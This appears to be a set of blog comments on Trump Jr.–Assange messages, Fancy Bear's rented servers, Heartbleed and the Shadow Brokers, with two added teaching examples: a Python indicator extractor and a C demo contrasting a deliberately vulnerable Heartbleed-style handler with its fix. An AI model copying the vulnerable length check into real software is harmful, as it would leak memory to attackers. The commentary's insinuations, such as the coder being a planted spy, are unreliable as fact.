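The attribution artifacts the comment above keeps returning to (a hard coded IP address in the malware, Bit.ly links in the phishing emails) are the kind of thing an analyst pulls out of a sample with an indicator-extraction pass long before anyone argues about who was behind it. What follows is an added Python example, not code from the page or from CrowdStrike, Secureworks or anyone else named in this thread. The sample blob and everything in it are constructed: the IPv4 addresses are from the RFC 5737 documentation ranges and the bit.ly path is made up, so none of them is the indicator from the actual cases. The extractor scans both plain ASCII and UTF-16LE text, because a C2 address stored as a Windows wide string is invisible to a plain `strings`/grep pass, and it rejects dotted quads that cannot be an address.

```python
"""Pull candidate network indicators (IPv4 literals, bit.ly links) out of a
binary sample, checking ASCII and UTF-16LE text.

Added example, not code from the page or from any firm named in it.
The sample blob below is constructed; its addresses are RFC 5737 test ranges.
"""
import re
from ipaddress import AddressValueError, IPv4Address

# Dotted quad not glued to more digits or dots, so "1.2.3.4.5" does not yield
# a bogus "1.2.3.4"; octet range is checked separately in valid_ipv4().
IPV4_RE = re.compile(rb"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
# bit.ly links, the shortener discussed in the thread; other shorteners would
# be added as further alternatives here.
SHORTLINK_RE = re.compile(rb"https?://bit\.ly/[A-Za-z0-9]+")
# Four or more printable ASCII bytes each followed by a NUL byte: a UTF-16LE
# string of the kind Windows binaries and their configs commonly carry.
WIDE_RUN_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def wide_strings(blob: bytes) -> list[bytes]:
    """Return each UTF-16LE text run in blob, narrowed to its ASCII bytes."""
    return [m.group(0)[::2] for m in WIDE_RUN_RE.finditer(blob)]


def valid_ipv4(text: str) -> bool:
    """True for a well-formed dotted quad; rejects octets over 255 (999.1.1.1)."""
    try:
        IPv4Address(text)
    except AddressValueError:
        return False
    return True


def extract_indicators(blob: bytes) -> dict[str, list[str]]:
    """Scan the raw bytes plus every UTF-16LE run for IPv4 literals and links.

    Output is de-duplicated and sorted so two analysts get identical results
    for the same sample.
    """
    ipv4: set[str] = set()
    links: set[str] = set()
    for view in [blob, *wide_strings(blob)]:
        for m in IPV4_RE.finditer(view):
            candidate = m.group(1).decode("ascii")
            if valid_ipv4(candidate):
                ipv4.add(candidate)
        for m in SHORTLINK_RE.finditer(view):
            links.add(m.group(0).decode("ascii"))
    return {"ipv4": sorted(ipv4), "shortlinks": sorted(links)}


def encode_wide(text: str) -> bytes:
    """Encode text the way a Windows wide string is stored (UTF-16LE)."""
    return text.encode("utf-16-le")


# Constructed sample standing in for a config block carved out of a dropper.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8                          # header-ish padding
    + b"c2_host=192.0.2.10\x00"                           # ASCII IPv4 (TEST-NET-1)
    + b"ver=999.1.1.1\x00"                                # IP-shaped, first octet > 255
    + b"frag=203.0.113\x00\x00"                           # only three octets: no match
    + encode_wide("https://bit.ly/3xmpl0k") + b"\x00\x00"  # UTF-16LE link, hidden from ASCII grep
    + encode_wide("backup=198.51.100.7") + b"\x00\x00"     # UTF-16LE IPv4 (TEST-NET-2)
    + b"\xff\xfe\x7f" * 3                                 # binary noise
)

if __name__ == "__main__":
    for kind, values in extract_indicators(SAMPLE_BLOB).items():
        print(f"{kind}: {', '.join(values) or '-'}")
```

Whatever comes out of a pass like this is an indicator, not attribution. An address says where a sample talked to; as the comment notes for the Heartbleed-vulnerable host, it says nothing about who controlled that host at the time, and a shared hard coded address across two samples is equally consistent with shared tooling, a copied sample or a deliberately planted overlap.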
It happened again. Donald Trump Jr. was just caught engaging in some rather incriminating correspondences. This time over Twitter’s direct messaging (DM) system. With Julian Assange. So we have an answer to the question of whether or not the Trump team was in direct communication with Wikileaks: Yes they were. A lot. From September 2016 through the election and even some of 2017.
It started off on September 20, 2016, when Assange informed Trump Jr. that Wikileaks had successfully guessed the password for the website of a new anti-Trump political action committee and wanted to know if Don Jr. had “any comments”. Keep in mind that this is basically a conversation about stolen digital material. So we have an opening message from Julian Assange sent via Twitter offering stolen material, much like the bizarre opening email that Rob Goldstone sent to Don Jr. about the Russian government wanting to help the Trump team with ‘dirt’ on Hillary.
And as was the case with Goldstone’s offer, Don Jr. appeared to be more than happy to receive the help. According to one source he actually informed top Trump campaign staffers (Steve Bannon, Kellyanne Conway, and Jared Kushner) that Wikileaks had made contact when it first happened.
It appears that the correspondence was mostly one-sided, with Assange sending Trump Jr. suggestions or zany schemes (like trying to get Assange appointed Australia’s ambassador to the US). And both Trump Jr. and Trump Sr. appear to have actually followed the advice Assange was sending them at different points.
The Trumps fortunately didn’t take the last bit of advice Assange sent to them on election day when it still looked like Hillary Clinton was going to win. Unfortunately, they didn’t take his advice because Trump won and Julian’s advice was for Trump not to concede if he lost and instead say the election was rigged:
“The messages, obtained by The Atlantic, were also turned over by Trump Jr.’s lawyers to congressional investigators. They are part of a long—and largely one-sided—correspondence between WikiLeaks and the president’s son that continued until at least July 2017. The messages show WikiLeaks, a radical transparency organization that the American intelligence community believes was chosen by the Russian government to disseminate the information it had hacked, actively soliciting Trump Jr.’s cooperation. WikiLeaks made a series of increasingly bold requests, including asking for Trump’s tax returns, urging the Trump campaign on Election Day to reject the results of the election as rigged, and requesting that the president-elect tell Australia to appoint Julian Assange ambassador to the United States”
A long, and largely one-sided, correspondence between Wikileaks and Trump Jr. That’s another giant ‘uh oh’ for Don Jr. An ‘uh oh’ involving a discussion about Wikileaks breaking into an anti-Trump website (even if you guess the password correctly for a website, that’s still considered breaking into it):
And not only does Don Jr. respond with “Thank” 12 hours later, but he then informs senior Trump campaign team members about this:
So the Assange/Don Jr. correspondence starts September 20th. The correspondence continues, with Assange sending links he thinks Don Jr. should be promoting on October 3rd and Don Jr. responding “What’s behind this Wednesday leak I keep reading about,” a reference to Roger Stone’s tweet, “Wednesday@HillaryClinton is done. #WikiLeaks,” sent a day earlier. Assange doesn’t reply, but then on October 7th the Podesta emails get leaked less than an hour after the Access Hollywood tape is leaked. So we have Don Jr. asking Assange about an upcoming leak that Roger Stone warned about and that leak occurs a few days later:
And on October 12, five days after the Podesta emails get released, Assange writes to Don Jr. with a recommendation for Trump to promote a Wikileaks site set up to help people sift through the stolen documents. Don Jr. doesn’t reply, but 15 minutes after that DM from Assange, Trump tweets out that exact link:
15 minutes after Assange makes a recommendation and Trump Sr. tweets it out. Uh oh.
Assange tests the waters again on October 21st with his proposal for Trump to leak his own tax returns to Wikileaks in order to give Wikileaks an air of impartiality (recall how Trump did actually appear to leak his own tax returns in March of this year). And then on November 8th, he makes a truly ominous suggestion: contest the election if he loses and call it all rigged:
Assange then follows up in December with a request that Trump troll the world by pushing to have him made Australia’s ambassador to the US. Then Assange largely goes quiet, until July of this year after news of Trump Jr.’s meeting with Rob Goldstone and the Russian delegation in Trump Tower. It turns out it was Julian Assange who made the suggestion that Don Jr. leak all those correspondences to Wikileaks, which would leak them to the world, and instead Don Jr., who doesn’t respond to the DM, does the leaking himself hours later:
So we have this extensive digital trail of evidence that not only demonstrates an open line of communication between Julian Assange and the Trump campaign but also demonstrates the Trump team taking Assange’s advice. A digital trail left on Twitter! Yes, two very prominent people deeply involved with one of the biggest political scandals in American history were leaving extensive digital evidence of their open lines of communication with each other on Twitter!
It’s rather amazing. Perhaps even more amazing than the incriminating emails between Rob Goldstone and Don Jr., because it’s one thing for someone like Rob Goldstone to send an incriminating email. Rob Goldstone presumably wasn’t under surveillance at the time he sent that email. But Assange’s communications presumably are under surveillance. Especially his Twitter communications. Does Assange assume his Twitter DMs aren’t being monitored? He’s Julian Assange! Of course they’re being monitored if that’s a possibility. And Twitter doesn’t make their DMs super-encrypted and beyond law enforcement. So unless these DMs were sent using additional steps to encrypt the messages, it’s hard to see how Assange couldn’t know full well that he was leaving a digital trail tying himself back to the Trump campaign by choosing Twitter as the medium of communication.
And don’t forget, these messages started in September of 2016, months after Wikileaks became a central figure in the campaign by leaking the DNC emails. Wikileaks was already guaranteed to be under extensive US surveillance for that alone. And yet Julian Assange decides to use a medium like Twitter. One thing that’s not entirely clear from the story is whether or not he was using his official “Julian Assange” account or some more obscure account to send the DMs. But if this was his official Julian Assange account that would have been a remarkable move, because if there’s one Twitter account that you can assume is under surveillance by intelligence agencies around the world it’s Julian Assange’s account.
It’s almost amazing it took this long for these messages to come out considering who was sending them. Although perhaps what’s most amazing is that this entire Don Jr. & Julian situation is not at all amazing in the context of the entire #TrumpRussia investigation. Given the spy-farce nature of this entire saga, the Don Jr. & Julian drama should pretty much be expected. Which is pretty amazing.
Here’s an interesting twist to Julian Assange’s recently discovered correspondence with Donald Trump Jr.: The initial story that Assange messaged Trump Jr. about on September 20, 2016 — about a new anti-Trump website that was about to launch — was a story that Charles “Chuck” Johnson wrote about on his GotNews website just a couple of hours before Assange reached out to Trump Jr.
And while it’s unclear if Johnson was in contact with Assange at this point — Johnson’s comments at the time suggest otherwise — it’s still rather interesting given the apparent relations Johnson has with Wikileaks now: Roger Stone says that he has a “libertarian opinion journalist” contact with Wikileaks, and that sure sounds like Johnson, although he has vehemently denied it was Johnson. Additionally, Johnson reportedly helped arrange a meeting between Congressman Dana Rohrabacher and Assange in August of this year. So whether or not Johnson and Assange had an open line of communication at the time of the September 20, 2016, outreach to Trump Jr., it’s unambiguous that they have an open line of communication now. And let’s not forget about Johnson’s role in advising the quest to find Hillary Clinton’s hacked personal emails on the Dark Web, where he recommended to Peter Smith’s team that they contact “Guccifer 2.0” and Andrew “weev” Auernheimer about those hacked emails (Johnson and Auernheimer have a history of working together).
Given all those contacts, if Johnson wasn’t in direct contact with Wikileaks as of September 20, 2016, he probably at least knew someone who was:
“Charles Johnson, who calls himself an independent journalist and runs a site called GotNews, published an article at about 9:30 p.m. ET on September 20, 2016, claiming he had “obtained a memo from a George Soros-tied PR firm that is launching a website to spread conspiracy theories about Donald Trump’s connections to Russia.” Soros is the investor and business magnate who has become a favorite bogeyman of the far right”
That was about two hours before Assange reached out to Trump Jr., which appears to be why Johnson was so excited to see Wikileaks promoting the story shortly after Assange sent that message to Trump:
But also note the language Assange used when reaching out to Trump Jr. He makes it sound like Wikileaks was the one who discovered this news and figured out the “putintrump” password for the anti-Trump website:
That sure sounds like Assange is assuming that this is a Wikileaks exclusive story he’s got on his hands, just as Johnson’s GotNews story behaved as if this was exclusive to GotNews. And that raises an interesting question: did the same source send both GotNews.com and Wikileaks information about this website at the same time? Did Wikileaks and GotNews independently arrive at the same story that they independently published within hours of each other because they both got a hot tip from the same source? Or did Wikileaks read the GotNews story and then decide to reach out to Trump Jr., asking for a comment on it, and act like Wikileaks had this exclusive info?
If it’s the latter scenario, that would have been rather risky on Assange’s part because there’s no guarantee that the Trump team wouldn’t have already been aware of the GotNews story put up a couple hours earlier. GotNews is exactly the kind of site the Trump team would have been keenly monitoring.
But if it’s the former scenario, it raises another question: Since Assange says “We have guessed the password”, and yet GotNews appears to have also guessed the password, did Assange inadvertently reveal a much closer relationship to GotNews than previously acknowledged? In other words, are they so close that Assange considers GotNews to be part of ‘team Wikileaks’? It sure would explain a lot.
The BBC has a new piece on the server used by the hackers identified as APT28/Fancy Bear for the DNC server hacks of March 2016 and the Bundestag hack of 2015. Recall that the IP address of a command & control server was found hardcoded into the malware found from both the Bundestag hack and the DNC server hack. The piece is about the company that hosted that command & control server.
The piece contains a number of interesting fun facts about how the hacking took place. And, as we should expect at this point, it also raises a number of questions.
Here’s some of the fun facts:
1. The server hosting company for the server that was used in the APT28/Fancy Bear attacks is a UK-based company called Crookservers (that’s actually its name).
2. Crookservers is actually a server reseller. It leases servers from other companies based in France and Canada and then rents out access to those servers to its clients.
3. The owner of Crookservers is a man named Usman Ashraf. Social media shows that Ashraf lived in Oldham, UK, from 2010 to 2014 and now lives in Pakistan.
4. APT28/Fancy Bear hackers are believed to have rented servers from Crookservers for three years.
5. When Ashraf was notified in mid-2015 that his company’s servers were being used by hackers he claims to have promptly closed down the account. Keep in mind that this would be after the Bundestag hack (which was in May of 2015), but before the DNC server hack of March 2016.
6. The Crookservers clients believed to be the hackers paid using Bitcoin and a couple of other cryptocurrencies.
7. The presumed hackers demonstrated “poor tradecraft” (surprise!) according to the cybersecurity company Secureworks, which was hired by the BBC to analyze the information available about Crookservers.
8. One of the Crookservers users presumed to be an APT28/Fancy Bear hacker used the name “Roman Brecesku”.
9. On March 6, 2014, “Roman Brecesku” wrote to CrookServers saying “Hello, my server 91.121.108.153 was cracked. Please, reset the operating system with deleting all data.”
First, note that the 91.121.108.153 IP address isn’t the same command & control IP address found in the Bundestag and DNC malware (176.31.112.10). At the same time, it demonstrates that “Roman Brecesku” probably wasn’t the best server administrator from a security standpoint since his server got hacked (you’d think a Russian government hacker would be better at preventing hacks).
Also recall that, following the Bundestag hack, the 176.31.112.10 server used in the Bundestag attack was identified as using an old version of OpenSSL that would have left it vulnerable to the Heartbleed attack. And note that the Heartbleed attack was only publicly disclosed in April of 2014. So while we don’t know if this March 2014 hacking of one of this group’s servers was due to the Heartbleed attack, if it was due to Heartbleed it would have been some pretty sophisticated hackers who used this exploit a month before the world learned about it.
10. The 176.31.112.10 command & control server was rented by someone using the name “Nikolay Mladenov” who paid using Bitcoin and Perfect Money.
11. That 176.31.112.10 server was used in a spear-phishing attack on the 2014 Farnborough Air Show, and also on a UK TV station in July of 2015. The 176.31.112.10 IP address was also found in the malware of those attacks (again, not exactly great “tradecraft”).
12. That 176.31.112.10 server was used until June 2015, at which point the server was deleted following the media reports of the Bundestag attack. And, of course, June 2015 is long before the March 2016 timing of the Fancy Bear/APT28 DNC hack. The UK TV station hack ALSO took place after June 2015.
13. A financial account used by “Nikolay Mladenov” was also used by “Roman Brecesku”, and two other presumed hacker pseudonyms, “Bruno Labrousse” and “Klaus Werner”, to hire more computers through Crookservers.
14. One of the servers rented by this group appears to have access to “advanced malware” capable of sophisticated attacks on iOS systems. That malware happens to be “XAgent”. And as security analyst Jeffrey Carr has noted before, the XAgent malware is already “in the wild”, as evidenced by the fact that a cybersecurity firm was able to get its hands on the source code for the malware and discuss it as part of its investigation into APT28/Fancy Bear.
So that all certainly gives us a better idea of what is known about the server used in this hack. And yet we’re left with that rather obvious question: how was the 176.31.112.10 server used as the command & control server for the malware deployed in the March 2016 DNC server attacks when it was allegedly shut down in 2015 following the Bundestag attacks?
“Over three years, Fancy Bear rented computers through Crookservers, covering its tracks using bogus identities, virtual private networks and hard-to-trace payment systems.”
So for three years the group labeled “Fancy Bear”/APT28 by cybersecurity companies was using a number of different servers from Crookservers. A company set up by a guy, Usman Ashraf, who used to be in the UK but now lives in Pakistan. But Crookservers didn’t actually own the servers themselves. It was a server reseller that leased them from other companies based in France and Canada:
So a server reseller that was set up in 2012 using the address of an Oldham, UK, newsagent. But the BBC couldn’t find any evidence that this newsagent actually knew it was being listed as the address of Crookservers. Then the address gets switched to Pakistan. And the guy behind Crookservers, Usman Ashraf, appeared to be living in Oldham from 2010 to mid-2014 before moving to Pakistan. It’s not not shady.
And then there’s the shady activity by the hackers themselves. Shady activity that appears to demonstrate “poor tradecraft” according to the Secureworks cybersecurity firm. And that poor tradecraft includes the 91.121.108.153 server getting hacked in March of 2014, as the message from presumed hacker “Roman Brecesku” indicates:
So this hacking crew appears to have issues with their servers getting hacked. At least the 91.121.108.153 server. Which probably has something to do with the “poor tradecraft” assessment.
But the fact that the 176.31.112.10 IP was found in the malware for four different hacking operations might also have something to do with that “poor tradecraft” assessment. The IP address was found in the DNC server hack, the Bundestag hack, a Farnborough air show attack in 2014, and the UK TV station attack, although the server was apparently not under Fancy Bear’s control when the UK TV station and DNC attacks took place:
“Bear malware used to attack a UK TV station and the DNC also contained this IP address, although the server was no longer in Fancy Bear’s control when these attacks occurred.”
So two of the four hacks attributed to the 176.31.112.10 server happened after APT28/Fancy Bear lost control of the server. Huh. You’d think this kind of discrepancy would raise more eyebrows.
From a trusted associate:
Saw your post, Ptera, on the servers. Important to remember: at least at the time of the Heartbleed announcement, the OpenSSL board was majority German and Swede! I found that odd as the US is usually disproportionately represented on various standards committees or open source boards. Hell, that’s how we made the Internet our spy machine! But OpenSSL isn’t like that, at least from my perception. And the flaw was in the code of a German PhD student... who worked for a Deutsche Telekom subsidiary after leaving the project in 2012. I can’t find anything on him after 2014, which is odd in itself.
side note: it’s amusing to me that the “who is Satoshi Nakamoto?” mystery is still a thing! So many debunkings and frauds... yet I have not seen a debunking of the Siemens theory? It’s like watching people puzzle over the Malaysian air disaster. “Hmmm... the pilot was a supporter of jihad backing Anwar Ibrahim who just got sentenced that day... nah, that couldn’t have anything to do with it! what a mystery!” Sometimes the answers are right in front of our faces...
Who is Robin Seggelmann and did his Heartbleed break the internet?
By Lia Timson
German computer programmer Robin Seggelman is the man whose coding mistake, now known as Heartbleed, has left mi...
Dr Seggelman, 31, from the small town of Oelde in north-west Germany, is a contributor to the Internet Engineering Task Force (IETF), a not-for-profit global group whose mission is to make the internet work better. He is attached to the Munster University of Applied Sciences in Germany, where, as research associate in the networking programming lab in the department of electrical engineering and computer science, he has published a number of papers, including his thesis on strategies to secure internet communications in 2012. He has been writing academic papers and giving talks on security matters since 2009, while still a PhD student.
His academic research influence index score of two, based on the number of scientific citations of his work, suggests an influential thinker at the early stages of his scientific career.
According to his Xing profile, Dr Seggelman has worked for Deutsche Telekom IT services subsidiary T‑Systems, possibly the largest such consultancy in Germany, since 2012, as a solutions architect.’
Enjoy!
Dave Emory
@Dave & trusted associate:
That’s a good catch about the Heartbleed bug being introduced into OpenSSL by Deutsche Telekom employee Robin Seggelmann. And there’s an interesting fun fact about that bug that highlights one of the aspects of the open source software movement: Seggelmann introduced that bug in code that was part of his PhD thesis (see section 7.2 on the “Heartbeat extension” that was added to OpenSSL).
What makes this fun fact so relevant to the open source software movement is the fact that if there was ever a time it would be easy to introduce a bug in your code and not catch it, it would be when you’re writing your PhD thesis. That’s generally not a time when someone has a lot of time on their hands. A robust and secure open source software movement will require A LOT of volunteers with A LOT of time on their hands. It’s one example of the benefits that leisure time gives a society: the time for people to collectively do, voluntarily, the things that no one is going to pay anyone to do. Like maintaining open source software, especially software like OpenSSL that’s used to encrypt internet traffic.
Recall that Heartbleed reportedly existed for two years before being discovered. So that’s not just Seggelmann’s fault because a lot of eyes either saw the same code and missed the flaw or few others were looking at all. Unless Seggelmann was asked by the BND or something to implant that flaw intentionally, it’s hard to be mad at the guy. He’s one of the only people who was actually trying to upgrade and maintain the code, and bugs are unavoidable at some point. Especially subtle security flaws.
Also don’t forget the reports that anonymous sources claimed the NSA knew about Heartbleed for two years before it was disclosed. Which is not at all surprising if true. What would be surprising is if there weren’t all sorts of intelligence agencies aware of the bug shortly after it was introduced because they probably systematically review something as significant as OpenSSL updates. Along with who knows how many other private interests with the time and resources to pay people to quietly look for open source security vulnerabilities. Which again highlights the importance of a large pool of people with coding skills and lots of free time if society wants safe and secure free open source software. Leisure time pays dividends in a lot of different ways.
So with all that in mind, it’s worth noting that Seggelmann was also the author of a second OpenSSL security flaw that was found a couple of months after the Heartbleed exploit became public and lots of eyes started looking at that OpenSSL code. And this new flaw was just one of 6 flaws in OpenSSL that were publicly announced at that point. It was reportedly a particularly nasty four-year-old flaw that would allow “arbitrary code execution”. But it wasn’t the oldest of the 6 flaws. The oldest had been around since 1998. And it was extra nasty: it also allowed for the arbitrary execution of code. And man-in-the-middle attacks. And, again, this extra nasty bug was introduced in 1998 and never found (by anyone willing to tell) until 2014:
“In a post explaining how he discovered the CCS injection vulnerability (CVE-2014–0224), security researcher Masashi Kikuchi wrote that the ChangeCipherSpec (CCS) bug “has existed since the very first release of OpenSSL. The biggest reason why the bug hasn’t been found for over 16 years is that code reviews were insufficient, especially from experts who had experiences with TLS/SSL implementation.””
Finding bugs can be hard. Code reviews are time consuming. And it’s hard to come up with a better example of these realities than a 16-year-old man-in-the-middle security flaw in something like OpenSSL that no one discovered (at least no one inclined to tell everyone).
But that 1998 man-in-the-middle bug wasn’t Seggelmann’s bug in this batch of six found flaws. Seggelmann’s bug was introduced in 2010, the same year as Heartbleed was introduced. And like the man-in-the-middle attack, Seggelmann’s new bug allowed the “arbitrary execution of code” (which is quite a security flaw):
“Seggelmann is not completely to blame, of course. OpenSSL is an open source project. The ‘many eyes’ that look at this code failed to catch this bug”
Yep, even if Seggelmann is a spy paid to insert a bug, it’s hard to ignore the fact that the whole point of the open source movement is the conviction that bugs will be found and fixed. Especially really important bugs like a bug that might allow man-in-the-middle attacks and the arbitrary execution of code via an open source internet standard like OpenSSL. This was a group failure by a very big group.
It also all raises the question of how many improvements have been made in recent years on open source review. On the plus side, a large number of potential security flaws were found in open source security software (264 flaws) after Google used its software testing tools to scan a large number of open source tools. On the minus side, this points towards the reality that mega-companies like Google are probably going to fill in the gap for a lot of this code review, which isn’t exactly living up to the open source ideal as open source becomes more and more a component of big business.
On another plus side, Google will have an extra incentive to find and publicly disclose a lot of security flaws it finds because it can already spy on almost everyone so easily in so many other ways. That’s a plus side that doubles as a minus side.
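To make concrete what the “coding mistake” in the heartbeat extension actually was, here is an added example that is not from the page, from the quoted article, or from OpenSSL itself: a toy heartbeat handler written in the pre-fix shape and in the post-fix shape, run against a constructed block of “memory” in which a secret sits right after the record. The record layout (type, two-byte declared length, payload, at least 16 bytes of padding) and the two length checks in the fixed handler are those of the OpenSSL 1.0.1g fix; the function names, the zeroed padding and the embedded secret are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Heartbeat record: type(1) | payload_length(2, big-endian) | payload | padding(>=16).
 * The peer supplies payload_length; Heartbleed was echoing that many bytes without
 * checking them against the record actually received. Padding is zeroed here
 * (real OpenSSL uses random bytes); that is a simplification for this example. */
#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16

static int hb_build_response(const uint8_t *rec, size_t payload, uint8_t *out, size_t out_cap)
{
    size_t resp_len = 1 + 2 + payload + HB_PADDING;
    if (resp_len > out_cap) return -1;
    out[0] = TLS1_HB_RESPONSE;
    out[1] = (uint8_t)(payload >> 8);
    out[2] = (uint8_t)(payload & 0xff);
    memcpy(out + 3, rec + 3, payload);      /* echoes `payload` bytes, wherever they come from */
    memset(out + 3 + payload, 0, HB_PADDING);
    return (int)resp_len;
}

/* Pre-fix: trusts the declared length. If it exceeds the record, the memcpy above
 * walks past the record into whatever follows it in memory. */
int hb_process_vulnerable(const uint8_t *rec, size_t rec_len, uint8_t *out, size_t out_cap)
{
    if (rec_len < 3 || rec[0] != TLS1_HB_REQUEST) return -1;
    size_t payload = ((size_t)rec[1] << 8) | rec[2];   /* attacker-controlled */
    return hb_build_response(rec, payload, out, out_cap);
}

/* Post-fix: the two checks OpenSSL 1.0.1g added. The record must hold at least a
 * minimal heartbeat, and declared payload + padding must fit in the bytes received.
 * Anything else is silently discarded, as RFC 6520 requires. */
int hb_process_fixed(const uint8_t *rec, size_t rec_len, uint8_t *out, size_t out_cap)
{
    if (1 + 2 + HB_PADDING > rec_len) return -1;
    if (rec[0] != TLS1_HB_REQUEST) return -1;
    size_t payload = ((size_t)rec[1] << 8) | rec[2];
    if (1 + 2 + payload + HB_PADDING > rec_len) return -1;
    return hb_build_response(rec, payload, out, out_cap);
}

/* Constructed "process memory": a 4-byte heartbeat payload with a forged declared
 * length, immediately followed by an unrelated secret (both made up for the demo). */
static const char SECRET[] = "SESSION-COOKIE-abc123";

static size_t build_memory(uint8_t *mem, size_t cap, size_t claimed_len)
{
    const char payload[] = "ping";
    size_t actual = sizeof(payload) - 1;
    size_t rec_len = 1 + 2 + actual + HB_PADDING;
    memset(mem, 0, cap);
    mem[0] = TLS1_HB_REQUEST;
    mem[1] = (uint8_t)(claimed_len >> 8);
    mem[2] = (uint8_t)(claimed_len & 0xff);
    memcpy(mem + 3, payload, actual);                   /* padding stays zero */
    memcpy(mem + rec_len, SECRET, sizeof(SECRET) - 1);  /* adjacent, unrelated data */
    return rec_len;
}

static int contains(const uint8_t *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0) return 1;
    return 0;
}

/* 1 if the vulnerable handler echoes the neighbouring secret, else 0. */
int hb_vulnerable_leaks(void)
{
    uint8_t mem[128], out[256];
    size_t rec_len = build_memory(mem, sizeof mem, 64);  /* claims 64 bytes, carries 4 */
    int n = hb_process_vulnerable(mem, rec_len, out, sizeof out);
    return n > 0 && contains(out + 3, (size_t)n - 3, SECRET);
}

/* 1 if the fixed handler drops the forged record yet still answers an honest one. */
int hb_fixed_rejects(void)
{
    uint8_t mem[128], out[256];
    size_t rec_len = build_memory(mem, sizeof mem, 64);
    if (hb_process_fixed(mem, rec_len, out, sizeof out) != -1) return 0;
    rec_len = build_memory(mem, sizeof mem, 4);           /* honest length */
    return hb_process_fixed(mem, rec_len, out, sizeof out) == 1 + 2 + 4 + HB_PADDING;
}

int main(void)
{
    printf("vulnerable handler leaks adjacent memory: %s\n", hb_vulnerable_leaks() ? "yes" : "no");
    printf("fixed handler discards forged length:     %s\n", hb_fixed_rejects() ? "yes" : "no");
    return 0;
}
```

The point worth noticing is how small the diff is: the whole bug is one missing comparison between a length the peer wrote and the length of the record the server really has, and the fixed handler discards the record rather than erroring out, because a loud rejection would itself be an oracle. Note also that the over-read here is kept inside one array so the demo has no undefined behaviour; in the real server the bytes past the record were whatever the heap happened to hold, which is why keys and session cookies were the prize.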
Well that’s quite a twist. The New York Times and The Intercept just published a pair of stories about the US efforts to recover the still unreleased contents of the Shadow Brokers’ stolen NSA hacking tools. But the stories go far beyond just the Shadow Brokers:
The stories detail a US intelligence operation that started in December of 2016 to track down the Shadow Brokers and obtain the still unreleased hacking tools. The US worked through an American businessman in Germany as an intermediary. That led US agents to Carlo, a hacker who, according to The Intercept, was located in Germany but, according to the New York Times, was located in Vienna, Austria. Carlo had reportedly previously worked with US intelligence agents. Carlo offered to provide US agents with the full set of hacking tools — so the US could know what was taken — along with the names of people in his network.
Carlo convinced US agents that he was indeed in possession of the still unreleased hacking tools (or at least knew the people who were) by giving advance notice of the Shadow Brokers’ subsequent public releases of more hacking tools. So, on some level, it appears that US agents did indeed find someone who had the hacking tools, or knew who had them.
But that’s when things got extra weird. Carlo wanted immunity from US prosecution as the price for returning the unreleased tools, which the US wouldn’t provide. Those negotiations broke down, and the US agents offered to just buy the hacking tools from the hacker instead. And that’s when the negotiations were taken over by a Russian in Germany.
This Russian is apparently someone known to US intelligence agencies as a kind of ‘fixer’ for Russia’s FSB with a direct link to former FSB director Nikolai Patrushev. He’s also someone who had previously dealt with American intelligence operatives, according to US and European officials. He’s also known to have previously worked for a Russian oligarch to help move illicit shipments of semiprecious metals.
American intelligence agencies reportedly spent months tracking the Russian, including his flights to Berlin, his rendezvous with a mistress in Vienna and his trips home to St. Petersburg.
The Russian was also known to have ties to Eastern European cyber-criminals. And a history of money laundering with what is described as a “thin legitimate cover business” of a nearly bankrupt company that sold portable grills for streetside sausage salesmen that was incorporated in Britain. So there’s a surprising amount of information about this mysterious Russian intermediary provided. Potentially enough information to identify this guy. But it’s unclear how anonymous this guy wants to be because he was willing to be interviewed by both The Intercept and The New York Times. Yep, these reports were both based on interviews with this alleged FSB ‘fixer.’
So, if we’re to interpret this all at face value, the Russian government was behind the Shadow Brokers hack, they initially had a German hacker who was willing to return the hacking tools and expose his entire network in exchange for immunity. The hacker demonstrated a degree of closeness with the Shadow Brokers by predicting the public releases. But when the US refused the immunity deal and offered to buy the tools instead, the Russians used a known ‘fixer’ who had previously worked with US intelligence agents to negotiate that sale. And this FSB ‘fixer’ was willing to be interviewed and talk about this. Ummm....this seems like a really questionable story so far.
But it gets weirder. Much much weirder. The Russian also claimed to have a trove of compromising documents on Donald Trump, including a video of Trump consorting with prostitutes in a Moscow hotel room in 2013. It’s reported that there’s no evidence that such a video exists, although the New York Times report also includes a reference to an American businessman being shown a 15 second clip of a video showing a man in a room talking to two women. There’s no audio and there was no way to verify the man is Donald Trump. And the viewing took place at the Russian Embassy in Berlin, according to the businessman.
In addition to the video, the Russian also tried to sell other documents on Trump, including bank records, emails, and Russian intelligence data. The New York Times got to look at four of these documents that this mysterious Russian tried to pass along to the Americans (presumably the Russian provided them). One document featured Carter Page. Another featured Robert and Rebekah Mercer. None of the documents could be verified and all four were drawn almost entirely from news reports. The New York Times article includes a comment by a former KGB officer saying the purported Russian intelligence documents also contained stylistic and grammatical usages not typically seen in Russian intelligence reports.
Early on, the asking price for the material was $10 million but quickly dropped to $1 million. It was a few months after negotiations started that the American businessman was shown the video. The CIA reportedly didn’t actually want to get the purported dirt on Trump over concerns that this was an operation designed to sow discord between the White House and US intelligence agencies, and the CIA decided they just wanted to stick with retrieving the hacking tools. The $1 million price was agreed upon and a $100,000 cash drop intended to be a down payment took place in September.
But there were a number of hurdles before that price was arrived at. By April of 2017, it appeared a deal for the sale was worked out. The Russian intermediary met with US agents and a hand-off of a thumb drive took place at a West Berlin bar. The thumb drive was supposed to contain a sample of the hacking tools that were to come. But there was a big problem. That sample only contained hacking code that had already been publicly released. The CIA backed out of the deal. The Russian was reportedly furious and the negotiations continued, eventually leading up to the September $100,000 cash drop.
Additionally, according to the New York Times report, at least four Russians with espionage and underworld connections have appeared in Central and Eastern Europe offering to sell to US political operatives, private investigators, and spies compromising information that would corroborate the Steele dossier. Cody Shearer, an American political operative with ties to the Democratic Party, has also reportedly been traveling Eastern Europe for more than six months to secure this ‘kompromat’ from a different Russian.
So in September the $100,000 cash drop takes place, and a few weeks later the Russian began handing over data. But almost everything he delivered was the ‘kompromat’. Not the hacking tools. According to The Intercept, this kompromat included names of specific individuals and corporate entities allegedly tied to Russian interference in the 2016 U.S. election (so it would be a Russian government admission that it was involved in a US election interference campaign).
